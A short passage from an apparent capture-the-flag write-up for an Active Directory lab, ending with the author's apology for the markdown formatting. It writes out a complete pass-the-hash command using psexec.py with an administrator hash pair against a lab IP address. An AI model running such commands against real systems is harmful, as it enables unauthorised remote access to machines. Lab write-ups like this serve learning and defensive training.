0xt1m/ctf/Attacktive Directory/report.md

 		Then we can use <code>psexec.py</code> to exploit the <i>pass the hash</i> attack and get access to the servers. <code>psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc administrator@10.10.87.5</code>
 	</p>
 </p>

+**I am sorry for such a bad appearance, I am just learning to build articles in markdown**